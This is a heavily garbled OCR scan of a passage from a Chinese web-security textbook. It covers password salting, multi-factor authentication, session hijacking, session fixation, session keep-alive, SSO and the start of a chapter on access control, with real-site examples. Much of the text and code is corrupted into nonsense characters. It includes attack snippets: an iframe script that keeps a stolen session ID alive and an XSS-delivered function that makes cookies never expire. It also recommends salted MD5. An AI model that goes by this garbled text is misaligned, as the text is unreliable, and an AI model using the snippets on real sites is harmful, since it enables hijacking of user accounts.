为 了 避免 密码 哈 希 值 泄露 后 ， 黑 客 能 够 直接 通过 彩虹 表 查 询 出 密码 明 

文 ， 在 计算 密码 明文 的 哈 希 值 时 ， 增 加 一 个 <Salt*。“Salt 是 一 个 字符 

a 并 能 使 得 彩虹 表 一 类 的 攻击 
7% o 

Salt 的 使 用 如 下 : 


MD5(Username+Password+Salt ) 


其 中 ，Salt = abcddcba...... (随机 字符 串 ) 
Salt 应 该 保存 在 服务 器 端的 配置 文件 中 ， 并 妥 状 保管 。 


93 ”多 因素 认证 

对 于 很 多 重要 的 系统 来 说 ， 如 果 只 有 密码 作为 唯一 的 认证 手段 ， 从 安 
全 上 看 会 略 显 不 足 。 因 此 为 了 增强 安全 性 ， 大 多 数 网 上 银行 和 网 上 支 
付 平台 都 会 采用 双 因 素 认证 或 多 因素 认证 。 
SG 0 GNM 
=: 


文 付 宝 提 供 的 多 种 认证 方式 

除了 支付 密码 外 ， 手 机 动态 口令 、 数 字 证 书 、 宝 令 、 支 付 盾 、 第 三 方 
证 书 等 都 可 用 于 用 户 认 证 。 这 些 不 同 的 认证 手段 可 以 互相 结合 ， 使 得 
认证 的 过 程 更 加 安全 。 密 码 不 再 是 唯一 的 认证 手段 ， 在 用 户 密 码 丢 失 
的 情况 下 ， 也 有 可 能 有 效 地 保护 用 户 账 户 的 安全 。 

多 因素 认证 提高 了 攻击 的 门板。 比如 一 个 文 付 交 易 使 用 了 密码 与 数字 
证 书 双 因 素 认 证 ， 成 功 完 成 该 交易 必须 满足 两 个 条 件 : 一 是 密码 正 


Wi; 二 是 进行 文 付 的 电脑 必须 安装 了 该 用 户 的 数字 证 书 。 因 此 ， 为 了 
成 功 实 施 攻击 ， 黑 客 们 除了 盗 取 用 户 密码 外 ， 还 不 得 不 想 办 法 在 用 户 
电脑 上 完成 文 付 ， 这 样 就 大 大 提高 了 攻击 的 成 本 。 


9.4 Session 5 À E 

密码 与 证 书 等 认证 手段 ， 一 般 仅 仅 用 于 登录 (Login) 的 过 程 。 当 登录 
完成 后 ， 用 户 访问 网 站 的 页 面 ， 不 可 能 每 次 浏览 絮 请 求 页 面 时 都 再 使 
用 密码 认证 一 次 。 因 此 ， 当 认证 成 功 后 ， 就 需要 替换 一 个 对 用 户 透 明 
的 赁 证。 这 个 赁 证， 了 束 是 SessionID ° 

当 用 户 登 录 完 成 后 ， 在 服务 器 端 就 会 创建 一 个 新 的 会 话 (Session) , 
会 话 中 会 保存 用 户 的 状态 和 相关 信息 。 服 务 右 端 维 护 所 有 在 线 用 户 的 
Session ， 此 时 的 认证 ， 只 需要 知道 是 哪个 用 户 在 浏览 当前 的 页 面 即 
可 。 为 了 告诉 服务 器 应 该 使 用 哪 一 个 Ses-sion， 浏 览 器 需要 把 当前 用 户 
持 有 的 SessionID 上 告知 服务 器 » 

最 第 见 的 做 法 就 是 把 SessionID 加 密 后 保存 在 Cookie 中 ， 因 为 Cookie 会 
且 受 到 浏览 器 同 源 策略 的 保护 (参见 “浏览 器 
Xon s 


Value | Domin Path Expires 
| verifpsession 100942 ££849cT445 £8007T £0 E57 £4412 £26c1£0b433171c431bddf5T6a2ff5c0ÜT--- |. qq. com / Sezzion 
| nin | o0032750312 .qq. com / Session 
| sley | Br9Bdz9t5d - aq. com / Session 
| mid | 9786635422 qq. com / En, 18 Jan 2038 00:00:00 CET 
ptisp cn .Qq. com | / Session 
| ptez | 1fd9acedad001140776157S59daNd3da fel d267 599 529657 c12531 foc £d1T b89 .Qq. com 起 Sat, 01 Jan 2050 00:00:01 CET 
pt2rruin o0032750912 .Qq. com / Thu, 02 Jan 2020 00:00:00 CET 
| pev s. cookie | 1142293824782 .Qq. com 17 Xen, 18 Jan 2038 00:00:00 GET 
pev_pvid | 2189691820 .Qq. com / En, 18 Jan 2038 00:00:00 CET 
| prv_info | ssid=s870152787 .Qq. com / Session 
prv. flv 10.2 r154 .qq. com / En, 18 Jan 2038 00:00:00 CET 
| o cookie 52750912 qucm |f 
t 


En, 18 Jan 2038 00:00:00 GET 
To) nN nn， 
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SessionID — H Æ ^E m AAR, SL SE RIT KP AE) o RIEN BT 
SessionID 是 用 户 登 录 之 后 才 持 有 的 认证 和 凭证， 因此 黑客 不 需要 再 攻击 
登录 过 程 (比如 密码 ) ， 在 设计 安全 方案 时 需要 意识 到 这 一 点 。 
Session 劫 持 就 是 一 种 通过 窃取 用 户 Ses-sionID 后 ， 使 用 该 SessionID 登 录 
进 目标 账户 的 攻击 方法 ， 此 时 攻击 者 实际 上 是 使 用 了 目标 账户 的 有 效 
Session。 如 果 SessionID 是 保存 在 Cookie 中 的 ， 则 这 种 攻击 可 以 称 为 
Cookie 动 持 。 

Cookie 漆 露 的 途径 有 很 多 ， 最 常见 的 有 XSS 攻 击 、 网 络 Sniff， 以 及 本 地 
木马 窃取 。 对 于 通过 XSS 漏 洞 窃取 Cookie 的 攻击 ， 通 过 给 Cookie 标 记 
httponly， 可 以 有 效 地 缓解 XSS 窃 取 Cookie 的 问题 。 但 是 其 他 的 泄露 途 
径 ， 比 如 网 络 被 嗅 探 ， 或 者 Cookie 文 件 被 窃取 ， 则 会 涉及 客户 端的 环 
境 安全 ， 需 要 从 客户 端 着 手 解决 。 


SessionID 除 了 可 以 保存 在 Cookie 中 外 ， 还 可 以 保存 在 URL 中 ， 作 为 请 
求 的 一 个 参数 。 但 是 这 种 方式 的 安全 性 难以 经 受 考验 。 

在 手机 操作 系统 中 ， 由 于 很 多 手机 浏览 右 暂 不 文 持 Cookie， 所 以 只 能 
将 SessionID 作 为 URL 的 一 个 参数 用 于 认证 。 安 全 人 研究 者 kxlzx 曾 经 在 博 
客 上 列 出 过 一 些 无 线 WAP 中 因为 sid 汇 露 所 导致 的 安全 漏洞 。 其 中 一 个 
典型 的 场景 就 是 通过 Ref-erer 漆 露 URL 中 的 sid，QQ 的 WAP 邮 箱 曾 经 出 
过 此 漏洞， 测试 过 程 如 下 。 

首先 ， 发 送 到 QQ 邮箱 的 邮件 中 引用 了 一 张 外 部 网 站 的 图 片 : 


然后 ， 当 手机 用 户 用 手机 浏 宽 如 打开 QQ 邮箱 时 : 
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手机 浏览 器 在 解析 图 片 时 ， 实 际 上 是 发 起 了 一 次 GET 请 求 ， 这 个 请 求 
4H [Referer ° 

Referer J [8 7J : 


rm 


al 以 看 到 sid 就 包含 在 Referer 中 ， 在 wwwinbreak net 的 ARH as AEP By 
以 查看 到 此 值 ，QQ 邮 箱 的 sid 由 此 泄露 了 。 

访问 包含 此 sid 的 链接 ， 了 驶 可 以 登录 到 该 用 户 的 邮 
箱 中 。 

在 生成 SessionID 时 ， 需 要 保证 足够 的 随机 性 ， 比 如 采用 足够 强 的 伪 随 
机 数 生 成 算法 。 现 在 的 网 站 开发 中 ， 都 有 很 多 成 熟 的 开发 框架 可 以 使 
用 。 这 些 成 熟 的 开发 框架 一 般 都 会 提供 Cookie 管 理 、Session 管 理 的 画 
数 ， 可 以 善 用 这 些 函 数 和 功能 © 


9.5 Session Fixation it 

什么 是 Session Fixation 呢 ? 举 一 个 形象 的 例子 ， 假设 A 有 ARIS Ze A 
IRER TB, fBIEAJEISCHIEPUB HJZESHRUATSB, A Cie ROS 
— FE e 这 时 候 如 果 B 没 有 给 人 台 车 换 锁 的 话 ， A 仍然 是 可 以 用 藏 下 的 多 是 使 
用 汽车 的 。 

这 个 没有 换 “ 锁 ?而 导致 的 安全 问题 ， 就 是 SessionFixation 问 题 。 

在 用 户 登 录 网 站 的 过 程 中 ， 如 果 登 录 前 后 用 户 的 SessionID 没 有 发 生变 
化 ， 则 会 存在 Session Fix-ation 问 题 。 

具体 攻击 的 过 程 是 ， 用 户 X (攻击 者 ) 先 获取 到 一 个 未 经 认证 的 
SessionID， 然 后 将 这 个 Ses-sionID 交 给 用 户 Y 去 认证 ，Y 完 成 认证 后 ， 
服务 器 并 未 更 新 此 SessionID 的 值 (注意 是 未 改变 Ses-sionID ， 而 不 是 
未 改变 Session) ， 所 以 X 可 以 直接 和 凭借 和 此 SessionID 登 录 进 Y 的 账户 。 


X 如 何 才 能 让 Y 使 用 这 个 SessionID 呢 ? 4 FE SessionID 保存 在 Cookie 
中 ， 比 较 难 做 到 这 一 点 。 但 若是 SessionID 保 存在 URL 中 ， 则 X 只 需要 
诱 使 Y 打 开 这 个 URL 即 可 。 在 上 一 中 提 到 的 sid， 就 需要 认真 考虑 
Session Fixation 攻 击 。 

在 discuz 7.2 的 WAP 版 本 中 ， 束 存在 这 样 的 一 个 Session Fixation 攻 击 。 
MERIR URT Æ 


nira: uu wap/index.php? 
n-fo mati ae id=2iu2pf 


其 中 ，sid 是 用 于 认证 的 SessionID。 用 户 登 录 后 ， 这 个 sid 没 有 发 生 改 
变 ， 因 此 黑客 可 以 先 构 造 好 此 URL， 并 请 使 其 他 用 户 打 开 ， 当 用 户 登 
录 完 成 后 ， 黑 客 也 可 以 直接 通过 此 URL 进 入 用 户 账户 。 

解决 Session Fixation 的 正确 做 法 是 ， 在 登录 完成 后 ， 重 写 SessionID ° 
如 果 使 用 sid 则 需要 重 置 sid 的 值 ， 如 果 使 用 Cookie， 则 需要 增加 或 改变 
用 于 认证 的 Cookie 值 。 值 得 庆 焉 的 是 ， 在 今天 使 用 Cookie 才 是 互联 网 
的 主流 ，sid 的 方式 渐渐 被 淘汰 。 而 由 于 网 站 想 保 存 到 Cookie 中 的 东西 
变 得 越 来 越 多 ， 因 此 用 户 登 录 后 ， 网 站 将 一 些 数据 保存 到 关键 的 
Cookie 中 ， 已 经 成 为 一 种 比较 普 裔 的 做 法 。Session Fixation 攻 击 的 用 武 
之 地 也 驶 变 得 越 来 越 小 了 。 


9.6 ” ”Session 保持 攻击 

一 般 来 说 ，Session 是 有 生命 周期 的 ， 当 用 户 长 时 间 未 活动 后 ， 或 者 用 
户 点 击 退出 后 ， 服 务 器 将 销毁 Session。Session 如 果 一 直 未 能 失效 ， 会 
导致 什么 问题 呢 ? 前 面 的 章节 提 到 Session 支 持 攻 击 ， 是 攻击 者 窃取 了 
用 户 的 SessionID， 从 而 能 够 登录 进 用 户 的 账户 。 

但 如 果 攻 击 者 能 一 直 持 有 一 个 有 效 的 Ses-sion (比如 间隔 性 地 刷新 页 
面 ， 以 告诉 服务 器 这 个 用 户 仍 然 在 活动 ) ， 而 服务 器 对 于 活动 的 
Session 也 一 直 不 销毁 的 话 ， 攻 击 者 了 驶 能 通过 此 有 歼 Session 一 直 使 用 用 
户 的 账户 ， 成 为 一 个 永久 的 “后 门 ”。 

但 是 Cookie 有 失效 时 间 ，Session 也 可 能 会 过 期 ， 攻 击 者 能 永久 地 持 有 
iX ^l Sessionli ? 

一 般 的 应 用 都 会 给 session 设 置 一 个 失效 时 间 ， 当 到 达 失 歼 时 间 后 ， 
Session 将 被 销毁 。 但 有 一 些 系 统 ， 出 于 用 户 体验 的 考虑 ， 只 要 这 个 用 
户 还 “活着 ”， 就 不 会 让 这 个 用 户 的 Session 失 效 。 从 而 攻击 者 可 以 通过 
不 停 地 发 起 访问 请 求 ， 让 Session 一 直 “ 活 ”下 去 。 

安全 人 研究 者 kxlzx 曾 经 分 享 过 这 样 的 一 个 案例 ， 使 用 以 下 代码 保持 
Session: 


<script> 


/7 下 面 是 要 保持 ses3ion 的 地 址 。 


var url=" http: //bbs.ecshop.com/wap/index.php?sid-loÀL37"; 


window.setInterval("keepsid()", 60000); 


function keepsid(í)! 
document.qgetElementById("iframel").src-url-c-"stime-"4Math.randomn(í); 


1 
5 


</script> 


«iframe id-"iframel" src=""></iframe> 


其 原理 吏 征 不 俘 地 刷新 页 面 ， 以 保持 Session 不 过 期 : 


ZH a ZEV ARS) B28) LEO) 帮助 (H) 
@ - Cc x A! D file:///C:/Users/Administrator/Desk 
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测试 环境 

而 Cookie 是 可 以 完全 由 客户 端 控 制 的 ， 通 过 发 送 带 有 目 定 义 Cookie 头 
的 HITP 包 ， 也 能 实现 同样 的 效果 。 

安全 人 研究 者 cnqing 曾 经 开发 过 一 个 叫 “Ses-sionIE” 的 工具 ， 其 中 就 实现 
了 Session 状 态 的 保持 : 


SeeionlE- 


LETEAM Tm cncert.net i | 
| ET 


SessionIE 工 具 的 界面 

想 使 得 Cookie 不 失效 ， 还 有 更 简单 的 方法 。 

在 Web 开 发 中 ， 网 站 访问 量 如 果 比 较 大 ， 维护 Session 可 ES 48 Py 
KERM 9 Ath, HRS. WEARS ain NAEP Session, m 
JE Ses-sionJ 4E Cookie FIN RTF » Sas May, Se ova ek 
Cookie， 服 务 器 端 只 需要 解密 Cookie 即 可 得 到 当前 用 户 的 Session 了 » 


这 样 的 Session 如 何 使 其 过 期 呢 ? 很 多 应 用 都 是 利用 Cookie 的 Expire 标 
签 来 控制 Session 的 失效 时 间 ， 这 束 给 了 攻击 者 可 乘 之 机 。 
Cookie 的 Expire 时 间 是 完全 可 以 由 客户 端 控制 的 。 自 改 这 个 时 间 ， 并 
使 之 永久 有 歼 ， 就 有 可 能 获得 一 个 永久 有 效 的 Session， 而 服务 器 端 是 
完全 无 法 察觉 的 。 
以 下 代码 由 JavaScript 实 现 ， 在 XSS 攻 击 后 将 Cookie 设 置 为 永 不 过 期 。 

// 让 一 个 cookie 不 过 期 


nehta. 
function(cookieName) { 
if (anehta.dom.checkCookie(cookieName) == 


eturn false; 


document.cookie = cookieName 
anehta.dom.getCookie(cookieName) + 
"SU + "expires=Thu, 01- 
Jan-2038 00:00:01 GMT;"; 
catch (e){ 


} 
return true; 


攻击 者 甚至 可 以 为 Session Cookie 增 加 一 个 Expire 时 间 ， 使 得 原本 浏览 
需 天 闭 就 会 失效 的 Cookie 持 久 化 地 保存 在 本 地 ， 变 成 一 个 第 三 
Cookie (third-party cookie) 。 

如 何 对 抗 这 种 Session 保 持 攻击 呢 ? 

常见 的 做 法 古 在 一 定时 间 后 ， 强 制 销 贤 Ses-sion。 这 个 时 间 可 以 是 从 用 
户 登 录 的 时 间 算 起 ， 设 定 一 个 国 值 ， 比 如 3 天 后 就 强制 Session 过 期 。 
但 强制 销毁 Session 可 能 会 影响 到 一 些 正常 的 用 户 ， 还 可 以 选择 的 方法 
是 当 用 户 客户 端 发 生变 化 时 ， 要 求 用 户 重 新 登录 。 比 如 用 户 的 IP、 
UserA-gent 等 信息 发 生 了 变化 ， 就 可 以 强制 销毁 当前 的 Session， 并 要 
求 用 户 重 新 登录 。 

和 最 后 ， 还 需要 考虑 的 是 同一 用 户 可 以 同时 拥有 几 个 有 效 Session。 者 每 
个 用 户 只 允许 拥有 一 个 Session， 则 攻击 者 想 要 一 直 保 持 一 个 Session 也 
人 。 当 用 户 再 次 登录 时 ， 攻 击 者 所 保持 的 Session 将 被 “中 


9.7 单 点 登录 (SSO) 
单 点 登录 的 英文 全 称 是 Single Sign On， 简 称 SSO。 它 希望 用 户 只 需要 
登录 一 次 ， 就 可 以 访问 所 有 的 系统 。 从 用 户 体 验 的 角度 看 ，SSO 无 疑 
让 用 户 的 使 用 更 加 的 方便 ， 从 安全 的 角度 看 ，SSO 把 风险 集中 在 单 点 
上 ， 这 样 做 是 有 利 有 赂 的 。 
SSO 的 优点 在 于 风险 集中 化 ， 束 只 需要 保护 好 这 一 个 点 。 如 果 让 每 个 
系统 各 目 实 现 登 录 功 能 ， 由 于 各 系统 的 产品 需求 、 应 用 环境 、 开 发 工 
程 师 的 水 平 都 存在 差异 ， 登 录 功 能 的 安全 标准 难以 统一 。 而 SSO 解 决 
了 这 个 问题 ， 它 把 用 户 登 录 的 过 程 集中 在 一 个 地 方 。 在 单 点 处 设计 安 
全 方案 ， 甚 至 可 以 考虑 使 用 一 些 较 “ 重 ”的 方法 ， 比 如 双 因 素 认 证 。 此 
外 对 于 一 些 中 小 网 站 来 说， 维护 一 份 用 户 名 、 密 码 也 是 没有 太 大 必要 
的 开销 ， 所 以 如 果 能 将 这 个 工作 委托 给 一 个 可 以 信任 的 第 三 方 ， 就 可 
以 将 精力 集中 在 业务 上 。 
SSO 的 缺点 同样 也 很 明显 ， 因 为 风险 集中 了 ， 所 以 单 点 一 旦 被 攻破 的 
话 ， 后 果 会 非常 严重 ， 影 响 的 范围 将 涉及 所 有 使 用 单 点 登录 的 系统 。 
降低 这 种 风险 的 办 法 是 在 一 些 敏感 的 系统 里 ， 再 单独 实现 一 些 额 外 的 
认证 机 制 。 比 如 网 上 文 付 平 台 ， 在 付款 前 要 求 用 户 再 输入 一 次 密码 ， 
或 者 通过 手机 短信 验证 用 户 吴 份 等 。 
目前 互联 网 上 最 为 开放 和 流行 的 单 点 登录 系统 是 OpenID。OpenID 是 一 
个 开放 的 单 点 登录 框架 ， 它 锅 望 使 用 URI 作 为 用 户 在 互联 网 上 的 号 份 
标识 ， 每 个 用 户 (End User) 将 拥有 一 个 唯一 的 URI。 在 用 户 登 录 网 站 
(Relying Party) 时 ， 用 户 只 需要 提交 他 的 OpenID (就是 用 户 唯 一 的 
URI) 以 及 OpenID 的 提供 者 (OpenID Provider) ， 网 站 就 会 将 用 户 重 
定向 到 OpenID 的 提供 者 进行 认证 ， 认 证 完成 后 再 重 定向 回 网 站 。 
OpenID 的 认证 流程 可 以 用 下 图 描述 。OpenID 的 认证 过 程 
在 使 用 OpenID 时 ， 第 一 步 是 同 网 站 提供 OpenID 。 


文件 (BE FSE ZEV BRS) BSB) LET) ”帮助 {H) 
G- e X A ||] file//I/Users/Administrator/Desk 
| `} file//C:/Users...or/Desktop/a.htm x | | | fille:///C:/Us...920-%62C 
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OpenID 的 提供 者 是 my-openid.com ° 


第 三 步 ， 用 户 将 在 OpenID 的 提供 者 网 站 登录 ， 并 重 定 向 回 网 站 。 
a 
OpenID 模 式 仍 然 存 在 一 些 问 题 。OpenID 的 提供 者 服务 水 平 也 有 高 有 


低 ， 作 为 OpenID 的 提供 者 ， 一 旦 网 站 中 断 服 务 或 者 关闭 ， 都 将 给 用 户 
市 来 很 大 的 不 便 。 因 此 目前 大 部 分 网 站 仍然 是 很 到 慎 地 使 用 OpenID， 
为 一 种 辅助 或 者 可 选 的 登录 模式 ， 这 也 限制 了 OpenID 


9.8 ”小 结 

本 章 介 绍 了 认证 相关 的 安全 问题 。 认 证 解决 的 是 “Who Am I? ”的 问 
wl, CENE T TC BIA ICM, Sse KPNI DIAS 

认证 的 手段 是 丰富 多 彩 的 。 在 互联 网 中 ， 除 了 密码 可 以 用 于 认证 外 ， 
还 有 很 多 新 的 认证 方式 可 供 使 用 。 我 们 也 可 以 组 合 使 用 各 种 认证 手 
段 ， 以 双 因 素 认证 或 多 因素 认证 的 方式 ， 提 高 系统 的 安全 强度 。 

在 Web 应 用 中 ， 用 户 登 录 之 后 ， 服 务 器 端 通常 会 建立 一 个 新 的 Session 
以 跟踪 用 户 的 状态 。 每 个 Session 对 应 一 个 标识 符 SessionID SessionID 
用 来 标识 用 户 号 份 ， 一 般 是 加 密 保 存在 Cookie 中 。 有 的 网 站 也 会 将 
Session 保 存在 Cookie 中 ， 以 减轻 服务 絮 端 维护 Session 的 压力 。 围 绕 着 
Session 可 能 会 产生 很 多 安全 问题 ， 这 些 问题 都 是 在 设计 安全 方案 时 需 
要 考虑 到 的 。 

本 草 的 最 后 介绍 了 单 点 登录 ， 以 及 最 大 的 单 点 登录 实现 : OpenID。 单 
点 登录 有 利 有 闵 ， 但 只 要 能 够 合理 地 运用 这 些 技 术 ， 对 网 站 的 安全 就 
都 是 有 益处 的 。 


第 10 章 ”访问 控制 


“权限 ”一 词 在 安全 领域 出 现 的 频率 很 高 。“ 权 限 ”* 实 际 上 是 一 种 “能 
力 ”。 对 于 权限 的 合理 分 配 ， 一 直 古 安全 设计 中 的 核心 问题 。 但 “ 权 
限 "一 词 的 中 文 侣 义 过 于 广泛 ， 因 此 本 章 中 将 使 用 “访问 控制 " 代 符 。 在 
互联 网 安全 领域 ， 尤 其 是 Web 安 全 领域 中 , “权限 控制 ?的 问题 都 可 以 
归结 为 “访问 控制 "的 问题 ， 这 种 描述 也 更 精确 一 些 。 


10.1 What Can I Do? 

在 上 一 章 中 ， 我 们 曾 指 出 “认证 (Authentication) ”与 “授权 
(Authorization) ”的 不 同 。“ 认 证 ”解决 了 “Who am I?” 的 问题 ， 而 “ 授 

权 ” 则 解决 了 “What can I do?” 的 问题 。 

权限 控制 ， 或 者 说 访问 控制 ， 广 泛 应 用 于 各 个 系统 中 。 抽 象 地 说 ， 都 

是 某 个 主体 (subject) 对 某 个 客体 (object) 需要 实施 某 种 操作 
(operation) ， 而 系统 对 这 种 操作 的 限制 就 是 权限 控制 。 


ue 为 了 保护 网 络 资源 的 安全 ， 一 般 是 通过 路 由 设备 或 者 防火 
墙 建立 基于 了 的 访问 控制 。 这 种 访问 控制 的 主体 "是 网 络 请 求 的 发 起 
方 比如 一 台 PC) , “客体 ”是 网 络 请 求 的 接收 方 ea 
器 ) ， 主 体 对 客体 的 4 “操作 "是 对 客体 的 某 个 端口 发 起 网 络 请 求 。 
操作 能 否 执行 成 功 ， 是 受到 防火 墙 ACL 策 略 限制 的 。 


r^ TCP/UDP | 223.223,223.224]27 E 


r^ TCP/UDP | 223.223.223.203  |* 


个 通过 X 阻止 X 1838 a 日 志 
个 通过 ( 关 ) 其 阻止 ( 关 ) © EO) | BSED 


防火 墙 的 ACL 策 略 面板 


在 操作 系统 中 ， 对 文件 的 访问 也 有 访问 控制 。 此 时 “主体 ”是 系统 的 用 
户 , “客体 ”是 被 访问 的 文件 ， 能 否 访问 成 功 ， 将 由 操作 系统 给 文件 设 
置 的 ACL REE o 比如 在 Linux 系 统 ; 一 个 文件 可 以 
执行 的 操作 分 为 “ 读 ” “执行 2 三 种 ， 分 别 由 r、w、x 表 示 。 这 三 
种 操作 同时 对 应 着 三 mis. 文件 拥有 害 、 文件 拥有 者 所 在 的 用 户 
e 主体、 客体 、 操 作 这 三 者 之 间 的 对 应 关系 ， 构 成 了 访 
JH | 


在 一 个 安全 系统 中 ， 确 定 主体 的 身份 是 “认证 ”解决 的 问题 ;而 客体 是 
一 种 资源 ， 是 主体 发 起 的 请 求 的 对 象 。 在 主体 对 客体 进行 操作 的 过 程 
问 控制 ”。 

主体 “能 够 做 什么 ”， 就 是 权限 。 权 限 可 以 细 分 成 不 同 的 能 力 
( capability ) ° Æ Linux 的 文件 系统 ， 将 权限 分 成 
了 “ 读 ”、“ 写 ”、“ 执 行 ” 三 种 能 力 。 用 户 可 能 对 某 个 文件 拥有 “ 读 ” 的 权 
限 ， 但 却 没有 “ 写 ” 的 权限 。 

在 Web 应 用 中 ， 根 据 访问 客体 的 不 同 ， 常 见 的 访问 控制 可 以 分 为 “基于 
URL 的 访问 控制 >、“ 基 于 方法 (method) 的 访问 控制 ?和 “基于 数据 的 
访问 控制 ”。 

一 般 来 说 , “基于 URL 的 访问 控制 ”是 最 常见 的 。 要 实现 一 个 简单 的 “ 基 
于 URL 的 访问 控制 *， 在 基于 Java 的 Web 应 用 中 ， 可 以 通过 增加 一 个 和 人- 
ter 实 现 ， 如 下 : 


// 获取 访问 功能 
String url-request.getRequestPath(); 
// 进行 权限 验证 
er user-request.getSession().get("user"); 


oolean 
ermit-PrivilegeManager.permit( user, url ); 


mi 
hain.doFilter( request, response ); 
e 


当 访 问 控制 存在 缺陷 时 ， 会 如 何 呢 ? 我 们 看 看 下 面 这 些 真 实 的 案例 ， 
这 些 案例 来 目 漏洞 披露 平台 WooYun。 

台 某 页 面 存 在 未 授权 访问 漏洞 ， 导 致 攻击 者 可 以 胡乱 修 
改 节目 表 : 


> rs 
| 


i > Œ f | © jiemu.ifeng.com/ifengepgwebM/EPGIm ort 
U saxe C web C webshell CJ domain C Google $} Google E 


[m 1j d | ] 
Be Sitios [2010-11-01 06:30:00 — 
. pee 


本 国医 本 ooo C 
RAR | [ommno 
| [smwam | [2010-1101 07:2800 
凤凰 网 分 站 的 后 台 

mop 后 台 管 理 系统 未 授权 访问 : 


e © o ey A uy © e el e http: //adsupport. mop. com/apps /running /adnit 


AENA Sit 刷新 主页 RE UR | 
veu. Som Queue SASKA [Poore on Linse 国 新 建文 件 De Ona 


 T"'-—————— ————ssm— 


当前 位 置 : 用 户 管理 


用 户 名 称 : | .查询 | 


+ 装备 管理 选择 ID UID 名 称 性 别 


+ 场地 管理 
+ 道具 管理 [| 327454 729211284 Tee x 
> 特殊 功能 

mop 后 台 


网 易 茶 分 站 后 台 存 在 未 授权 访问 : 


CIS NDEPEREENSCEUISENEUESIRSES Ee 


THe) Bg) EO) RRA Tad) Ba 
ie MR GEB e 


@ http: //rainbowli fe. 163. con/admin/articleI... | ^c Y ` 


Deprecated: Function session is registered() is deprecated 
in /home2/www/minisite/2007/0423/rainbowlife/admin/admin. inc. php on li 


Warning: Cannot modify header information - headers already sent by (output < 


at /home2/www/minisite/2007/0423/rainbowlife/admin/admin. inc. php:3) 
in /home2/www/minisite/2007/0423/rainbowlife/admin/admin.inc.php on li 


MEN ^ dmn 彩虹 生活 通 彩虹 名 人 堂 美女 掌 门 人 其 他 文章 


类 型 : 彩虹 热点 新 闻 [z | 
标题 : | 
RRF : | 
| 
网 易 某 分 站 的 后 台 
酷 6 网 某 活 动用 户 审 核 页 面 未 授权 访问 : 


GENI PLEA: 


527 yaokaiang 110806983 puit 
526 yackaiang [10606582 pu 
525. Bisco, KIRREL 2011-01-07 1551 yaokadang [10806988 Bun 
$24 ddádd 2011-01-07 1541 kal [10806936 qt 
503 TN 2010-11-03 18.00 SEX 9746148 quit 
522 Hd 2010-08-17 1545 sage 0475357 ire 
521 Ade — 2010-08-17 1537 qungieg 19475357. — quiu 
520 Toy 2010-08-02 20.24 holy 19376341 Mt 
519 — ~ 2010-07-30 20.03 AALE 1669326 GE 
518 2010-07-22 1219 加 日 环 19146725 frites 
517 D IBEXE Eme 2010-07-19 2255 Rx 19231253 Butt 
516 pez RENE, seit 2010-07-19 2252 Bak 9231253 qun 
515 EIAS 2010-07-19 1513 DI. 19273519 pu 
514 nu 2010-07-19 14:39 mte oue 1239132 dea 
513 Bie—pswets 2010-07-19 00.45 Tit 19276745 Bat 
512 ARNE —— 2010-07-18 2320 a>! 10239633 qms 
511 Wm Bw Sie 2010-07-18 2244 Abl 9239633 Bur 
510 EE paw Shee 2010-07-18 20.02 isl (5239633 dau 
509 RH Pw She 2010-07-18 10.52 Asi 19239633 po 
508 RE ew shee 2010-07-18 1046 el 9239633 qas 
507 RE BAW 与 你 同 在 2010-07-18 10.39 Az (90239633 pui 
506 HATAK. hi 2010-07-17 2324 pau 19277163 egt 
505 PAR” 2010-07-17 2246 Li: 19276692 Bum 
j 2010-07-17 2224 Tet 19276745 Ted 
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酷 6 网 后 台 

在 正常 情况 下 ， 管 理 后 台 的 页 面 应 该 只 有 管理 员 才 能 够 访问 。 但 这 些 

系统 未 对 用 户 访 问 权 限 进行 控制 ， 导 致 任意 用 户 只 要 构造 出 了 正确 的 

URL， 束 能 够 访问 到 这 些 页 面 。 

在 正常 情况 下 ， 这 些 管理 页 面 是 不 会 被 链接 到 前 台 页 面 上 的 ， 搜 索引 

警 的 仆 虫 也 不 应 该 搜索 到 这 些 页 面 。 但 是 把 需要 保护 的 页 面 “ 注 * 起 

来 ， 并 不 是 解决 问题 的 办 法 。 攻 击 者 惯用 的 仪 俩 是 使 用 一 部 包含 了 很 
EH BEER, 把 这 些 “ 藏 > 起 来 的 页 面 扫 出 来 。 比 如 上 面 的 4 个 案 

例 中 ， 有 3 个 其 管理 URL 中 都 包含 了 “admin” 这 样 的 敏感 词 。 

loci mud dise 任何 一 部 攻击 的 字典 中 。 

在 这 些 案 例 的 背后 ， 其 实 只 需要 加 上 简单 的 “基于 页 面 的 访问 控制 ”， 

束 能 解决 问题 7 了。 D omn c ELE. 


10.2 ”垂直 权限 管理 

访问 控制 实际 上 是 建立 用 户 与 权限 之 间 的 对 应 关系 ， 现 在 应 用 广泛 的 
一 种 方法 ， 就 是 “基于 角色 的 访问 控制 (RoleBased Access 
Control) ”， 人 简称 RBAC ° 

CHE] 

RBAC 事 先 会 在 系统 中 定义 出 不 同 的 角色 ， 不 同 的 角色 拥有 不 同 的 权 
限 ， 一 个 角色 实际 上 就 是 一 个 权限 的 集合 。 而 系统 的 所 有 用 户 都 会 被 
分 配 到 不 同 的 角色 中 ， 一 个 用 户 可 能 拥有 多 个 角色 ， 角 色 之 间 有 高 低 
之 分 ARAR) 。 在 系统 验证 权限 时 ， 只 需要 验证 用 户 所 属 的 角 
色 ， 然 后 就 可 以 根据 该 角色 所 拥有 的 权限 进行 授权 了 。 

Spring Security 中 的 权限 管理 ， 束 是 RBAC 模 型 的 一 个 实现 。 Spring 
Security 基 于 SpringMVC 框 架 ， 它 的 前 身 是 Acegi， 是 一 套 较 为 全 面 的 
Web 安 全 解决 方案 。 在 Spring Security 中 提供 了 认证 、 授 权 等 功能 。 在 
这 里 我 们 只 关注 Spring Secu-rity 的 授权 功能 。 

Spring Security 提 供 了 一 系列 的 “FilterChain”， 每 个 安全 检查 的 功能 都 
会 插入 在 这 个 链条 中 。 在 与 Web 系 统 集成 时 ， 开 发 者 只 需要 将 所 有 用 
户 请 求 的 URL 都 引入 到 Filter Chain 即 可 。 

Spring Security 提 供 两 种 权限 管理 方式 ， 一 种 是 “基于 URL 的 访问 控 
制 ”"， 一 种 是 “基于 method 的 访问 控制 *。 这 两 种 访问 控制 都 是 RBAC 模 
型 的 实现 ， 换 言 之 ， 在 Spring Security 中 都 是 验证 该 用 户 所 属 的 角色 ， 
以 决定 是 否 授 权 。 

对 于 “基于 URL 的 访问 控制 "”，Spring Secu-rity 使 用 配置 文件 对 访问 URL 
的 用 户 权 限 进行 设 定 ， 如 下 : 


«sec:intercept-url pattern="/ 
president portal.do**" 
access-"ROLE PRESIDENT" /> 


«sec:il ="/ 
